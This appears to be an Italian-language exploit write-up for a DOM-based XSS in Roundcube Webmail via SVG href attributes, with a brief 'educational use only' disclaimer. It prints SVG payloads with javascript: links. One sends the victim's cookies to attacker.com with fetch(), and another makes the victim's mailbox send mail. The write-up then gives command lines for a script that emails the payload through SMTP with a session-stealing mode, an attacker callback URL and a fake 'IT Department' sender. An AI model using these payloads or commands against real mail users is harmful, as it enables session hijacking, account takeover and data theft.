
Exploit Python per XSS basato su DOM in Roundcube Webmail (CVE-2026-25916) tramite attributi href SVG, che consente il dirottamento della sessione e l'esfiltrazione di dati attraverso email appositamente create.
Titolo dell'Exploit: DOM XSS in Roundcube Webmail tramite href SVG (CVE-2026-25916)
Autore: Mohammed Idrees Banyamer
Contatto: GitHub @mbanyamer | Instagram @banyamer_security
Paese: Giordania
Data: 9 febbraio 2026
CVE: CVE-2026-25916
Tipo: Cross-Site Scripting (XSS) basato su DOM
Piattaforma: Applicazione Web
Testato su: Roundcube 1.6.8, Ubuntu 22.04
Punteggio CVSS: 6.1 (Medio)
⚠️ AVVERTENZA: Questo exploit è destinato esclusivamente a scopi educativi e di test autorizzati.
Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.
L'autore non è responsabile di usi impropri o attività illegali.
Le versioni di Roundcube Webmail precedenti alla 1.6.9 contengono una vulnerabilità XSS basata su DOM nella gestione degli SVG. L'applicazione non sanifica correttamente gli attributi e negli elementi SVG, consentendo l'esecuzione di JavaScript tramite email appositamente create.
hrefxlink:hrefVersioni Affette: Roundcube Webmail < 1.6.9
Corretta in: Versione 1.6.9 (Commit 26d7677)
CWE: CWE-79 - Neutralizzazione impropria dell'input durante la generazione di pagine web
Vettore di attacco: Remoto tramite email
Impatto: Dirottamento della sessione, furto dell'account, esfiltrazione dei dati
La vulnerabilità risiede in rcube_washtml.php dove gli attributi href negli elementi SVG non venivano validati correttamente:
<!-- Elementi SVG vulnerabili -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"